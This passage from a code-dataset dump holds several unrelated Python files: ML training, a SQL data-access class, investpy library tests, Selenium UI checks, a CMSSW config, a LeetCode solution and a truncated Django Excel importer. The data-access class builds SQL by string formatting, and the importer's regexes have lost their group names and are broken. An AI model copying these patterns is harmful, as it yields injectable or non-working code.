encoder(*in_val)\n hidden = np.zeros((len(l_val), embedding_dim))\n batch_preds = []\n\n x = np.array([processor.word_index['']] * len(l_val))\n\n for i in range(1, ans_length):\n x, hidden, _ = model(x, in_val[0], features, hidden)\n cost = tf.keras.losses.sparse_categorical_crossentropy(\n labels[:, i], x,\n from_logits=True\n )\n x = tf.argmax(x, axis=-1)\n loss_val += tf.reduce_mean(cost)\n batch_preds.append(x)\n batch_preds = tf.stack(batch_preds, axis=1)\n predicts.append(batch_preds)\n\n loss_val /= len(predicts)\n end_val = time.time()\n\n print()\n print(' Validation: Loss - {:.4f} Time - {:.4f}s'.format(\n loss_val, end_val-st_val))\n print(' Total time per epoch: {:.4f}s'.format(\n time.time() - epoch_start))\n print()\n\n if save and loss_val < min_loss:\n min_loss = loss_val\n print('Saving model weights')\n encoder.save_weights(enc_weights_path)\n model.save_weights(gen_weights_path)\n print('Saved!')\n\n\nif __name__ == '__main__':\n from main.utils import make_parser\n parser = make_parser()\n\n args = parser.parse_args()\n\n DEBUG = args.debug\n\n if DEBUG:\n np.set_printoptions(precision=4)\n\n save = args.no_save\n\n st = time.time()\n print('Setting up dataset')\n with open('./data/answer_what.json', 'r') as f:\n dataset = json.load(f)\n\n print('Total loaded data size:', len(dataset))\n random.shuffle(dataset)\n\n train, val = dataset[:data_size], dataset[data_size: data_size+val_size]\n print('Data size: Train: {} Val: {}'.format(len(train), len(val)))\n\n # use all words from training set processed primarily\n processor = text_processor(maxlen=seq_length, from_config=True)\n ans_processor = text_processor(maxlen=ans_length, from_config=True)\n\n print('Time to setup: {:.4f}s'.format(time.time() - st))\n\n main(train, val, save=save)\n print('Training completed')\n print('Total running time: {:.4f}s'.format(time.time() - st))\n","sub_path":"old/run_what_answering_model.py","file_name":"run_what_answering_model.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"235442736","text":"from app.db.dao import DataAccessObject, DataObject\r\n\r\nfrom app.db.releases_dao import Release\r\nfrom app.db.correction_states_dao import CorrectionState\r\nfrom app.db.changenotes_dao import ChangeNoteFull\r\nfrom app.db.changenote_states_dao import ChangeNoteState\r\n\r\n\r\n\r\nclass Correction(DataObject):\r\n def __init__(self, row_id=None, uri=None, problem_report_id=None, release_id=None, correction_state_id=None, change_note_id=None):\r\n self.id = row_id\r\n self.uri = uri\r\n self.problem_report_id = problem_report_id\r\n self.release_id = release_id\r\n self.correction_state_id = correction_state_id\r\n self.change_note_id = change_note_id\r\n\r\n\r\nclass CorrectionFull(DataObject):\r\n def __init__(self, row_id=None, uri=None, problem_report_id=None, release=None, correction_sate=None, change_note=None):\r\n self.id = row_id\r\n self.uri = uri\r\n self.problem_report_id = problem_report_id\r\n self.release = release\r\n self.correction_state = correction_sate\r\n self.change_note = change_note\r\n\r\n def as_dict(self):\r\n dict = self.__dict__\r\n dict['release'] = self.release.__dict__\r\n dict['correction_state'] = self.correction_state.__dict__\r\n\r\n if self.change_note:\r\n dict['change_note'] = self.change_note.as_dict()\r\n\r\n return dict\r\n\r\n\r\nclass CorrectionDAO(DataAccessObject):\r\n def __init__(self, db_schema=None):\r\n DataAccessObject.__init__(self, 'correction', Correction, db_schema)\r\n\r\n def get_all_by_problem_report_ids(self, pr_id_list):\r\n\r\n if not pr_id_list:\r\n return None\r\n\r\n id_list = (\"{0}\").format( ','.join( str(v) for v in pr_id_list) )\r\n sql = \"\"\"\r\n SELECT `correction`.`id` AS corr_id,\r\n `correction`.`uri` AS corr_uri,\r\n `correction`.`problem_report_id` AS corr_problem_report_id,\r\n `release`.`id` AS rel_id,\r\n `release`.`release` AS rel_release,\r\n `correction_state`.`id` AS corrs_id,\r\n `correction_state`.`state` AS corrs_state,\r\n `change_note`.`id` AS cn_id,\r\n `change_note`.`title` AS cn_title,\r\n `change_note`.`uri` AS cn_uri,\r\n `change_note_state`.`id` AS cns_id,\r\n `change_note_state`.`state` AS cns_state\r\n FROM `correction`\r\n LEFT JOIN `release` ON `correction`.`release_id` = `release`.`id`\r\n LEFT JOIN `correction_state` ON `correction`.`correction_state_id` = `correction_state`.`id`\r\n LEFT JOIN `change_note` ON `correction`.`change_note_id` = `change_note`.`id`\r\n LEFT JOIN `change_note_state` ON `change_note`.`change_note_state_id` = `change_note_state`.`id`\r\n WHERE `problem_report_id` IN ({0})\r\n ORDER BY `problem_report_id`\r\n \"\"\".format( id_list )\r\n\r\n db_cursor = self._conn.execute(sql, None, cursorclass=self._conn.CURSORCLASS_DICTIONARY)\r\n\r\n return_obj_list = []\r\n\r\n row_data = db_cursor.fetchone()\r\n while row_data:\r\n return_obj_list.append( self._build_detailed_correction(row_data) )\r\n row_data = db_cursor.fetchone()\r\n\r\n db_cursor.close()\r\n\r\n return return_obj_list\r\n\r\n\r\n def _build_detailed_correction(self, row_data):\r\n corr = CorrectionFull()\r\n corr.id = row_data['corr_id']\r\n corr.uri = row_data['corr_uri']\r\n corr.problem_report_id = row_data['corr_problem_report_id']\r\n\r\n corr.release = Release( row_data['rel_id'],\r\n row_data['rel_release'] )\r\n\r\n corr.correction_state = CorrectionState( row_data['corrs_id'],\r\n row_data['corrs_state'] )\r\n\r\n cns = ChangeNoteState( row_data['cns_id'],\r\n row_data['cns_state'] )\r\n\r\n if row_data['cn_id']:\r\n corr.change_note = ChangeNoteFull( row_data['cn_id'],\r\n row_data['cn_title'],\r\n row_data['cn_uri'],\r\n cns)\r\n\r\n return corr\r\n\r\n","sub_path":"server/app/db/corrections_dao.py","file_name":"corrections_dao.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"182980885","text":"# Copyright 2018-2021 Alvaro Bartolome, alvarobartt @ GitHub\n# See LICENSE for details.\n\nimport pytest\n\nimport investpy\n\n\ndef test_investpy():\n \"\"\"\n This function checks that both the investpy's author and version are the correct ones.\n \"\"\"\n\n print(investpy.__author__)\n print(investpy.__version__)\n\n\ndef test_investpy_stocks():\n \"\"\"\n This function checks that stock data retrieval functions listed in investpy work properly.\n \"\"\"\n\n params = [\n {\n 'country': 'spain',\n },\n {\n 'country': None,\n },\n ]\n\n for param in params:\n investpy.get_stocks(country=param['country'])\n investpy.get_stocks_list(country=param['country'])\n\n params = [\n {\n 'country': None,\n 'columns': ['full_name', 'name'],\n 'as_json': True\n },\n {\n 'country': None,\n 'columns': ['full_name', 'name'],\n 'as_json': False\n },\n {\n 'country': 'spain',\n 'columns': ['full_name', 'name'],\n 'as_json': True\n },\n {\n 'country': 'spain',\n 'columns': ['full_name', 'name'],\n 'as_json': False\n },\n {\n 'country': 'spain',\n 'columns': None,\n 'as_json': False\n },\n ]\n\n for param in params:\n investpy.get_stocks_dict(country=param['country'],\n columns=param['columns'],\n as_json=param['as_json'])\n\n investpy.get_stock_countries()\n\n params = [\n {\n 'as_json': True,\n 'order': 'ascending',\n },\n {\n 'as_json': False,\n 'order': 'ascending',\n },\n {\n 'as_json': True,\n 'order': 'descending',\n },\n {\n 'as_json': False,\n 'order': 'descending',\n },\n ]\n\n for param in params:\n investpy.get_stock_recent_data(stock='BBVA',\n country='spain',\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n investpy.get_stock_historical_data(stock='BBVA',\n country='spain',\n from_date='01/01/1990',\n to_date='01/01/2019',\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n for value in ['spanish', 'english']:\n investpy.get_stock_company_profile(stock='BBVA',\n country='spain',\n language=value)\n\n params = [\n {\n 'stock': 'bbva',\n 'country': 'spain',\n 'as_json': False\n },\n {\n 'stock': 'bbva',\n 'country': 'spain',\n 'as_json': True\n },\n {\n 'stock': 'HSBK',\n 'country': 'kazakhstan',\n 'as_json': False\n }\n ]\n\n for param in params:\n investpy.get_stock_information(stock=param['stock'], country=param['country'], as_json=param['as_json'])\n\n params = [\n {\n 'country': 'spain',\n 'as_json': True,\n 'n_results': 50\n },\n {\n 'country': 'united states',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'bosnia',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'palestine',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'dubai',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'ivory coast',\n 'as_json': False,\n 'n_results': 50\n },\n {\n 'country': 'indonesia',\n 'as_json': False,\n 'n_results': 362\n }\n ]\n\n for param in params:\n investpy.get_stocks_overview(country=param['country'], as_json=param['as_json'], n_results=param['n_results'])\n\n params = [\n {\n 'stock': 'bbva',\n 'country': 'spain'\n },\n {\n 'stock': 'entel',\n 'country': 'chile'\n }\n ]\n\n for param in params:\n investpy.get_stock_dividends(stock=param['stock'], country=param['country'])\n\n params = [\n {\n 'stock': 'bbva',\n 'country': 'spain',\n 'summary_type': 'balance_sheet',\n 'period': 'annual'\n },\n {\n 'stock': 'aapl',\n 'country': 'united states',\n 'summary_type': 'income_statement',\n 'period': 'quarterly'\n },\n {\n 'stock': 'barc',\n 'country': 'united kingdom',\n 'summary_type': 'cash_flow_statement',\n 'period': 'annual'\n }\n ]\n\n for param in params:\n investpy.get_stock_financial_summary(stock=param['stock'],\n country=param['country'], \n summary_type=param['summary_type'],\n period=param['period'])\n\n investpy.search_stocks(by='name', value='BBVA')\n\n\ndef test_investpy_currency_crosses():\n \"\"\"\n This function checks that currency cross data retrieval functions listed in investpy work properly.\n \"\"\"\n\n params = [\n {\n 'base': None,\n 'second': None,\n },\n {\n 'base': 'EUR',\n 'second': None,\n },\n {\n 'base': None,\n 'second': 'EUR',\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n },\n ]\n\n for param in params:\n investpy.get_currency_crosses(base=param['base'], second=param['second'])\n investpy.get_currency_crosses_list(base=param['base'], second=param['second'])\n\n params = [\n {\n 'base': None,\n 'second': None,\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': None,\n 'second': None,\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': 'EUR',\n 'second': None,\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': 'EUR',\n 'second': None,\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': None,\n 'second': 'USD',\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': None,\n 'second': 'USD',\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n 'columns': None,\n 'as_json': True\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n 'columns': None,\n 'as_json': False\n },\n {\n 'base': 'EUR',\n 'second': 'USD',\n 'columns': ['name', 'full_name'],\n 'as_json': False\n },\n ]\n\n for param in params:\n investpy.get_currency_crosses_dict(base=param['base'],\n second=param['second'],\n columns=param['columns'],\n as_json=param['as_json'])\n\n investpy.get_available_currencies()\n\n params = [\n {\n 'currency_cross': 'EUR/USD',\n 'from_date': '01/01/2018',\n 'to_date': '01/01/2019',\n 'as_json': True,\n 'order': 'ascending',\n },\n {\n 'currency_cross': 'EUR/USD',\n 'from_date': '01/01/1990',\n 'to_date': '01/01/2019',\n 'as_json': False,\n 'order': 'descending',\n },\n {\n 'currency_cross': 'XAG/USD',\n 'from_date': '01/01/2010',\n 'to_date': '01/01/2015',\n 'as_json': False,\n 'order': 'descending',\n },\n {\n 'currency_cross': 'XAU/USD',\n 'from_date': '01/01/2010',\n 'to_date': '01/01/2015',\n 'as_json': False,\n 'order': 'descending',\n }\n ]\n\n for param in params:\n investpy.get_currency_cross_recent_data(currency_cross=param['currency_cross'],\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n investpy.get_currency_cross_historical_data(currency_cross=param['currency_cross'],\n from_date=param['from_date'],\n to_date=param['to_date'],\n as_json=param['as_json'],\n order=param['order'],\n interval='Daily')\n\n params = [\n {\n 'currency_cross': 'EUR/USD',\n 'as_json': False\n },\n {\n 'currency_cross': 'EUR/USD',\n 'as_json': True\n },\n {\n 'currency_cross': 'XAU/USD',\n 'as_json': True\n },\n {\n 'currency_cross': 'XAG/USD',\n 'as_json': True\n }\n ]\n\n for param in params:\n investpy.get_currency_cross_information(currency_cross=param['currency_cross'], as_json=param['as_json'])\n \n params = [\n {\n 'currency': 'try',\n 'as_json': False,\n 'n_results': 100\n },\n {\n 'currency': 'amd',\n 'as_json': True,\n 'n_results': 100\n }\n ]\n \n for param in params:\n investpy.get_currency_crosses_overview(currency=param['currency'], as_json=param['as_json'], n_results=param['n_results'])\n\n investpy.search_currency_crosses(by='base', value='EUR')\n\n\ndef test_investpy_search():\n \"\"\"\n This function checks that investpy search function works properly.\n \"\"\"\n\n params = [\n {\n 'text': 'bbva',\n 'products': None,\n 'countries': None,\n 'n_results': 5\n },\n {\n 'text': 'spain 3y',\n 'products': None,\n 'countries': None,\n 'n_results': 5\n },\n {\n 'text': 'ibex 35',\n 'products': None,\n 'countries': None,\n 'n_results': 5\n },\n {\n 'text': 'bnp daxplus',\n 'products': None,\n 'countries': None,\n 'n_results': None\n },\n {\n 'text': 'apple',\n 'products': ['stocks'],\n 'countries': ['united states'],\n 'n_results': 1\n }\n ]\n\n for param in params:\n results = investpy.search_quotes(text=param['text'],\n products=param['products'],\n countries=param['countries'],\n n_results=param['n_results'])\n\n dates = [\n {\n 'from_date': '01/01/2018',\n 'to_date': '01/01/2019'\n },\n {\n 'from_date': '01/01/1990',\n 'to_date': '01/01/2019'\n },\n ]\n\n for result in results:\n print(result)\n result.retrieve_recent_data()\n for date in dates:\n result.retrieve_historical_data(from_date=date['from_date'], to_date=date['to_date'])\n break\n\n\ndef test_investpy_news():\n \"\"\"\n This function checks that investpy news retrieval functionality works as expected.\n \"\"\"\n\n params = [\n {\n 'time_zone': None,\n 'time_filter': 'time_only',\n 'countries': ['spain', 'france'],\n 'importances': ['high', 'low'],\n 'categories': ['credit', 'employment'],\n 'from_date': None,\n 'to_date': None\n },\n {\n 'time_zone': 'GMT -3:00',\n 'time_filter': 'time_only',\n 'countries': None,\n 'importances': None,\n 'categories': None,\n 'from_date': '01/01/2020',\n 'to_date': '01/02/2020'\n }\n ]\n\n for param in params:\n investpy.economic_calendar(time_zone=param['time_zone'],\n time_filter=param['time_filter'],\n countries=param['countries'],\n importances=param['importances'],\n categories=param['categories'],\n from_date=param['from_date'],\n to_date=param['to_date'])\n\n\ndef test_investpy_technical():\n \"\"\"\n This function checks that investpy news retrieval functionality works as expected.\n \"\"\"\n\n params = list()\n\n for interval in list(investpy.utils.constant.INTERVAL_FILTERS.keys()):\n params.append({\n 'name': 'bbva',\n 'country': 'spain',\n 'product_type': 'stock',\n 'interval': interval\n })\n\n for param in params:\n investpy.technical_indicators(name=param['name'],\n country=param['country'],\n product_type=param['product_type'],\n interval=param['interval'])\n\n investpy.moving_averages(name=param['name'],\n country=param['country'],\n product_type=param['product_type'],\n interval=param['interval'])\n\n investpy.pivot_points(name=param['name'],\n country=param['country'],\n product_type=param['product_type'],\n interval=param['interval'])\n\n\nif __name__ == '__main__':\n test_investpy()\n test_investpy_stocks()\n test_investpy_currency_crosses()\n test_investpy_search()\n test_investpy_news()\n test_investpy_technical()\n","sub_path":"tests/test_investpy.py","file_name":"test_investpy.py","file_ext":"py","file_size_in_byte":14686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"209310120","text":"import logging\nimport re\nfrom pages.dashboard_ui_page import DashboardUiPage\nfrom cases.helpers import CheckBase\n\n\nlog = logging.getLogger('bender')\n\n\nclass TestDashboardUi(CheckBase):\n\n page = None\n\n def set_page(self):\n self.page = DashboardUiPage(self._driver)\n\n def check_node_status(self):\n \"\"\"\n Purpose:\n Check node status in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info('Checking node status in virtualization dashboard...')\n try:\n # Check basic elements\n self.page.basic_check_elements_exists()\n except AssertionError as e:\n log.error(e)\n return False\n\n with self.page.switch_to_frame(self.page.frame_right_name): \n try:\n # Check current layer is correct\n test_layer = self._build + '+1'\n assert self.page.cur_layer_link.text == test_layer, \\\n \"Current layer is {}, not {}\".format(\n self.page.cur_layer_link.text, test_layer)\n\n # Check rollback button\n assert self.page.rollback_btn, \"Rollback button not exists\"\n except AssertionError as e:\n log.error(e)\n return False\n\n return True\n\n def check_vms_quantity(self):\n \"\"\"\n Purpose:\n Check the running Virtual Machines quantity in virtualization dashboard\n \"\"\"\n log.info(\"Check the running Virtual Machines quantity in virtualization dashboard\")\n\n with self.page.switch_to_frame(self.page.frame_right_name):\n # VM quantity is 0 where no vms are running\n try:\n assert re.search('0', self.page.vm_quantity.text), \\\n \"VM quantity is not 0\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n # Todo creating vm via rhvmapi\n\n def check_node_health(self):\n \"\"\"\n Purpose:\n Check node health in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Check node health in virtualization dashboard\")\n\n with self.page.switch_to_frame(self.page.frame_right_name):\n # click 'Health link'\n self.page.health_link.click()\n wev = self.page.wait_until_element_visible\n wev(self.page.node_health_dialog_title)\n\n # expand the node health dialog\n accordion_header_btn_list = list(self.page.health_dialog_btns)\n for i in accordion_header_btn_list[0:4]:\n i.click()\n self.page.wait(10)\n ok_number = len(list(self.page.ok_icons))\n try:\n assert ok_number == 16, \"OK number is {}, not 16\".format(ok_number)\n except AssertionError as e:\n log.error(e)\n return False\n finally:\n # Close dialog\n close_btn_list = list(self.page.close_btns)\n for j in close_btn_list[0:]:\n j.click()\n\n return True\n\n def check_node_info(self):\n \"\"\"\n Purpose:\n Check node information in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Check node information in virtualization dashboard\")\n ret = True\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.cur_layer_link.click()\n wev = self.page.wait_until_element_visible\n wev(self.page.cur_layer_dialog_title)\n self.page.wait(5)\n\n accordion_header_btn_list = list(self.page.layer_dialog_btns)\n for i in accordion_header_btn_list:\n i.click()\n self.page.wait(3)\n\n # Current layer should be identical with build layer\n test_layer = self._build + '+1'\n entry_txt_list = list(self.page.entry_txts)\n assert entry_txt_list[1].text == test_layer, \\\n \"Test layer fail\"\n\n # Since no update action on the new fresh installed\n # system, default layer is current layer\n assert entry_txt_list[0].text == entry_txt_list[1].text, \\\n \"Default is not current layer\"\n\n # Todo: check other info like kernel, initrd, etc\n except AssertionError as e:\n log.error(e)\n ret = False\n finally:\n close_btn_list = list(self.page.close_btns)\n for j in close_btn_list[0:]:\n j.click()\n return ret\n\n def check_network_page(self):\n \"\"\"\n Purpose:\n Go to the Networking page in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Go to the Networking page in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.network_info_link.click()\n self.page.wait(3)\n assert re.search(r'network', self.page.current_url), \\\n \"Not directed to network page\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n\n def check_logs_page(self):\n \"\"\"\n Purpose:\n Go to the Logs page in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Go to the Logs page in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.system_logs_link.click()\n self.page.wait(3)\n assert re.search(r'system/logs', self.page.current_url), \\\n \"Not directed to system logs page, as url is {}\".format(self.page.current_url)\n except AssertionError as e:\n log.error(e)\n return False\n return True\n\n def check_storage_page(self):\n \"\"\"\n Purpose:\n Go to the Storage page in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Go to the Storage page in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.storage_link.click()\n self.page.wait(3)\n assert re.search(r'storage', self.page.current_url), \\\n \"Not directed to storage page\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n\n def check_ssh_key(self):\n \"\"\"\n Purpose:\n Check the ssh host key in virtualization dashboard\n \"\"\"\n self.set_page()\n log.info(\"Check the ssh host key in virtualization dashboard\")\n\n try:\n with self.page.switch_to_frame(self.page.frame_right_name):\n self.page.ssh_key_link.click()\n self.page.wait(3)\n assert self.page.ssh_key_dialog_title, \\\n \"SSH key error\"\n except AssertionError as e:\n log.error(e)\n return False\n return True\n","sub_path":"cases/checks/test_dashboard_ui.py","file_name":"test_dashboard_ui.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"431032334","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process('Tau3MuSkim')\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\nprocess.load(\"TrackingTools/TransientTrack/TransientTrackBuilder_cfi\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nprocess.load(\"TrackingTools.TransientTrack.TransientTrackBuilder_cfi\")\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load(\"SkimTools.SkimTrigger.Tau3MuTriggerSkimAOD_cff\")\n\n#process.GlobalTag.globaltag = '94X_mc2017_realistic_v14'\nprocess.GlobalTag.globaltag = '102X_upgrade2018_realistic_v20' #\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n #'root://xrootd-cms.infn.it//store/user/bjoshi/BuTau3Mu/CRAB3_MC2018_BuTau3Mu_13TeV_DIGI/191212_193400/0000/BuTau3Mu_2018MC_106.root',\n 'root://xrootd-cms.infn.it//store/user/wangjian/DsToTau_TauTo3Mu/CRAB3_RunIIAutumn18DR_AODSIM/191120_085131/0000/TSG-RunIIAutumn18DR-00006_99.root',\n # 'root://xrootd-cms.infn.it//store/mc/RunIIFall17DRPremix/DsToTau_To3Mu_MuFilter_TuneCUEP8M1_13TeV-pythia8/AODSIM/PU2017_94X_mc2017_realistic_v11-v1/70000/FA2225BE-7549-E911-ADE0-3417EBE64BE8.root', \n #'root://xrootd-cms.infn.it//store/data/Run2018A/DoubleMuonLowMass/AOD/17Sep2018-v1/120000/3C6EECC5-5787-AC43-ACF0-3BE40CE1291C.root',\n #root://xrootd-cms.infn.it//store/data/Run2017F/DoubleMuonLowMass/AOD/09May2018-v1/80000/AECC4C56-BAB0-E811-B92A-008CFA1979AC.root'\n #\"file:/lustrehome/venditti/TestMiniAOD2017/CMSSW_9_4_4/src/CrabSubmission/MC/PiGun_RECO.root\"\n #\"file:/lustre/cms/store/user/rosma/PionGun_Pt0to30GeV/PiGun_13TeV_MC2017_RECO/190313_143541/0000/PiGun_RECO_979.root\"\n #'file:/lustre/cms/store/user/fsimone/DsTau3Mu/crab_crab_DsTau3Mu__13TeV_MC2016_RECO/190120_140919/0001/custom_DsTau3Mu_13TeV_RECO_crab350_1010.root',\n\n\n )\n)\n\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"Tree_trg.root\"))\n\n\nprocess.TreeMakerBkg = cms.EDAnalyzer(\"TriggerAnalysisT3M\",\n isMcLabel = cms.untracked.bool(True),\n isAnaLabel = cms.untracked.bool(True),\n muonLabel=cms.InputTag(\"looseMuons\"),\n #VertexLabel=cms.InputTag(\"offlinePrimaryVerticesWithBS\"),\n VertexLabel=cms.InputTag(\"offlinePrimaryVertices\"),\n genParticleLabel=cms.InputTag(\"genParticles\"),\n pileupSummary = cms.InputTag(\"addPileupInfo\"),\n Cand3MuLabel=cms.InputTag(\"ThreeMuonsVtxKalmanFit\"),\n triggerResults = cms.InputTag(\"TriggerResults\", \"\", \"HLT\"),\n triggerSummary = cms.InputTag(\"hltTriggerSummaryAOD\", \"\", \"HLT\"),\n AlgInputTag = cms.InputTag( \"gtStage2Digis\" )\n\n)\n\n\n\n\nprocess.TriggerTree = cms.Path(process.ThreeMuonSelSeq*\n process.TreeMakerBkg\n )\n\n\n\n\n\n","sub_path":"SkimTools/SkimTrigger/test/run_TriggerTreeMaker_MC_cfg.py","file_name":"run_TriggerTreeMaker_MC_cfg.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"329757954","text":"def nextGreaterElement(nums1, nums2):\n\n # result = []\n\n # for num in nums1:\n # index = nums2.index(num)\n # large = -1\n # for i in range(index + 1, len(nums2)):\n # if nums2[i] > num:\n # large = nums2[i]\n # break\n # result.append(large)\n \n # return result\n\n cache, stack = {}, []\n result = []\n\n for num in nums2:\n if len(stack) == 0:\n stack.append(num)\n elif stack[-1] >= num:\n stack.append(num)\n elif stack[-1] < num:\n while stack and stack[-1] < num:\n cache[stack.pop()] = num\n stack.append(num)\n \n for num in nums1:\n if num in cache:\n result.append(cache[num])\n else:\n result.append(-1)\n \n return result\n\n\nnums1 = [4,1,2]\nnums2 = [1,3,4,2]\nprint(nextGreaterElement(nums1, nums2))\n\n\n\"\"\"\ndef nextGreaterElement(self, findNums, nums):\n\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n\n cache, st = {}, []\n for x in nums:\n if len(st) == 0:\n st.append(x)\n elif x <= st[-1]:\n st.append(x)\n else:\n while st and st[-1] < x:\n cache[st.pop()] = x\n st.append(x)\n result = []\n for x in findNums:\n if x in cache:\n result.append(cache[x])\n else:\n result.append(-1)\n return result\n\n\n\n\"\"\"","sub_path":"Stacks/LeetCode/NextGreaterElementI_496.py","file_name":"NextGreaterElementI_496.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"644247857","text":"# Minus the old existing functions,\n# this contains only functions that will directly affect warehouse data.\n\nimport xlrd\nfrom io import BytesIO\nfrom django.core.files.base import ContentFile\nimport uuid\n\nfrom .models import Location, DataDate, Items, DataDate, \\\n make_location\n\nimport re, datetime, time, pytz\nfrom django.utils.timezone import activate\nfrom django.conf import settings\nfrom django import db\n\nfrom django.utils.translation import gettext\n# Used: process_excel_file\n\ndef process_excel_file(file):\n\n print(datetime.datetime.now())\n activate(settings.TIME_ZONE)\n filename = file.name\n\n file_regex = re.compile('(?P\\d\\d\\d\\d)(?P\\d\\d)'\n + '(?P\\d\\d)(?P\\d\\d)'\n + '(?P\\d\\d)(?P\\d\\d)')\n re_result = re.match(file_regex, filename)\n\n year = int(re_result.group(\"year\"))\n month = int(re_result.group(\"month\"))\n day = int(re_result.group(\"day\"))\n hour = int(re_result.group(\"hour\"))\n min = int(re_result.group(\"min\"))\n sec = int(re_result.group(\"sec\"))\n\n d = datetime.datetime(year=year,month=month,day=day,hour=hour,minute=min,second=sec)\n data_date_query = DataDate.objects.filter(date=d)\n if len(data_date_query) > 0:\n d_time_str = d.strftime('%m/%d/%Y %I:%M %p')\n m_1 = gettext(\"Excel file with date \")\n m_2 = gettext(\" has uploaded already.\")\n return m_1 + d_time_str + m_2\n\n data = file.read()\n workbook = xlrd.open_workbook(file_contents=data)\n worksheet = workbook.sheet_by_index(0)\n\n data_date = DataDate(date=d)\n data_date.save()\n\n def convert_lab_id(id_string):\n return int(float(id_string))\n\n def convert_item_code(item_code):\n \"\"\"\n xlrd (or excel) reads integers as floats (thus this converts any potential floats\n that should be an int for the item code into an item before converting it into a\n string.\n \"\"\"\n item_type = type(item_code)\n if item_type == float and int(item_code) == item_code:\n return str(int(item_code))\n else:\n return str(item_code)\n\n def get_date_from_xlrd(date_string):\n if date_string == \"\":\n return None\n # d = xlrd.xldate.xldate_as_datetime(date_string, workbook.datemode)\n timezone = pytz.timezone('Asia/Hong_Kong')\n print(date_string)\n year, month, day, hour, minute, second = xlrd.xldate_as_tuple(date_string, workbook.datemode)\n d = datetime.datetime(year, month, day, hour, minute, second, tzinfo=timezone)\n return d\n\n def cut_description_length(desc):\n return str(desc)[:100]\n\n column_map = {\n # Name has to mach Items model values\n (0, \"item_id\", int,),\n (2, \"location_code\", str,),\n (6, \"lab_id\", convert_lab_id,),\n (9, \"fifo_date\", get_date_from_xlrd,),\n (18, \"iv_create_date\", get_date_from_xlrd),\n (13, \"rcv\", str,),\n (27, \"item_code\", convert_item_code,),\n (28, \"ship_quantity\", int,),\n (31, \"item_weight\", float,),\n (36, \"last_out_date\", get_date_from_xlrd,),\n (39, \"description\", cut_description_length,),\n (33, \"customer_code\", int,),\n (42, \"avail_quantity\", int,),\n }\n\n location_dict = {}\n\n loc_regex = re.compile(\n '(?P.+)\\.(?P.+)\\.(?P[a-zA-Z]*)(?P\\d+)\\.(?P.+)\\.(?P.+)')\n\n\n items_list = []\n for row in range(1, worksheet.nrows):\n # for row in range(1, 1000):\n\n item_data = {}\n\n # for key, col in item_map.items():\n for column_tup in column_map:\n column = column_tup[0]\n key = column_tup[1]\n modifier = column_tup[2]\n\n v = worksheet.cell_value(row,column)\n\n item_data[key] = modifier(v)\n\n # Add item data dictionary to location_dict\n location_code = item_data[\"location_code\"]\n\n # Add item_data dictionary to item_dict\n item_code = item_data[\"item_code\"]\n\n if location_code in location_dict:\n location_inst = location_dict[location_code]\n else:\n r = re.match(loc_regex, location_code)\n\n warehouse_location = r.group(\"warehouse_location\")\n area = r.group(\"area\")\n aisle_letter = r.group(\"aisle_letter\")\n aisle_num = int(r.group(\"aisle_num\"))\n column = int(r.group(\"column\"))\n level = int(r.group(\"level\"))\n\n # Account for human error input of items into WMS\n if area == 'F' and 